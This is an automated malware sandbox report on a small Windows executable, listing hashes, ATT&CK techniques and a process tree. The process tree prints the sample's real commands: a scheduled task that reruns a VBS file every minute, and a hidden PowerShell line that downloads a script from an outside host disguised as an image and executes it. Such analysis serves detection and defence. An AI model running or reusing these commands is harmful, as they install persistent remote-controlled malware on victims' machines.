feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc

Analysis

max time kernel
48s
max time network
80s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
07/08/2023, 12:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
Size

6KB
MD5

77421b1f90fc1e9247f693e857e8c429
SHA1

63c26635980d5a185a24d1be79c877a1e8507133
SHA256

feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc
SHA512

0bb90e930e0856504631a95792175a149b8565a9acbfdbe68a74e13573e00f1eb433b3c73439523e670b3b66559619c3c85efce9881544f0381afc88e3e8b095
SSDEEP

96:1jYUzP8hRH7AKjC2LcS14bqxqsmthY2VxEzNt:Fz8hRb1CNSGJsmjYSu

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://a.top4top.net/p_814sg63b2.jpg

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4836	schtasks.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2968 wrote to memory of 4836	2968	feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe	81
PID 2968 wrote to memory of 4836	2968	feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe	81

C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
"C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
  2⤵
  - Creates scheduled task(s)
  PID:4836

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
1⤵
PID:2136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
  2⤵
  PID:4296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
    3⤵
    PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs

Filesize
537B

MD5
44476af998bf0a5714e3ab100f022a1e

SHA1
bf26b1f4227b8bfc27d4a7cb2a1cdd4ad224d08e

SHA256
ef4eae75f800b98fb7c189bd92ba4a1db6d1cc665791634d5ec3c3fe535c1ec2

SHA512
e02c3d2590f478deafaf3f20c421951c26ccf966817a7299fe2a4ede856190960f1853a4a2907d28f2ff24a357e9d0c039a69d1ee5f53e5c9ffde428d911bd99

Download Submit
memory/2968-133-0x000001D5F6410000-0x000001D5F6418000-memory.dmp

Filesize
32KB

Download
memory/2968-135-0x00007FFD20C60000-0x00007FFD21721000-memory.dmp

Filesize
10.8MB

Download
memory/2968-137-0x00007FFD20C60000-0x00007FFD21721000-memory.dmp

Filesize
10.8MB

Download
memory/4572-139-0x00007FFD1F950000-0x00007FFD20411000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads